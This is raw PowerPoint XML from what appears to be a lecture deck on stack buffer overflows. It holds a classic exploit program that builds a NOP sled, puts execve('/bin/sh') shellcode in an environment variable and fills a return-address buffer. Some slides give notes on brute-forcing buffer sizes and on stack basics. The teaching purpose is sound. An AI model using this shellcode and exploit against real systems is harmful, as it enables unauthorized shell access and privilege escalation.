              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>get_esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>__("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  char *buff, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, *egg;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> offset=DEFAULT_OFFSET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=DEFAULT_BUFFER_SIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eggsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=DEFAULT_EGG_SIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 2) offset  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eggsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[3]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (!(buff = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Can't allocate memory.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (!(egg = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eggsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Can't allocate memory.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>get_esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>() - offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Using address: 0x%x\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = buff;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (i = 0; i &lt; bsize; i+=4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = egg;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eggsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(shellcode) - 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = NOP;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(shellcode); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = shellcode[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  buff[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> - 1] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  egg[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eggsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> - 1] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>egg,"EGG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=",4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>putenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(egg);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>buff,"RET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=",4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>putenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(buff);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  system("/bin/bash");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="投影片編號版面配置區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E16D0DA-DC4B-4ED4-8850-997784A69DCB}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>23</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0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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2849CC1-2436-49BD-9703-D2B6C776ECD1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24037800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b="1" dirty="0"/>
              <a:t>We can write a batch file or a shell script to automate the repeating process of trying different buff size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6144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03D25B43-98BE-4EAA-AE0A-FA199602D98D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>24</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a:t>https://www.theiphonewiki.com/wiki/Jailbreak_Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" altLang="en-US" b="1" dirty="0"/>
              <a:t>Search for “buffer overflow”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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2849CC1-2436-49BD-9703-D2B6C776ECD1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1724576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dirty="0"/>
              <a:t>LIFO: The last object placed on the stack will be the first object to be removed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
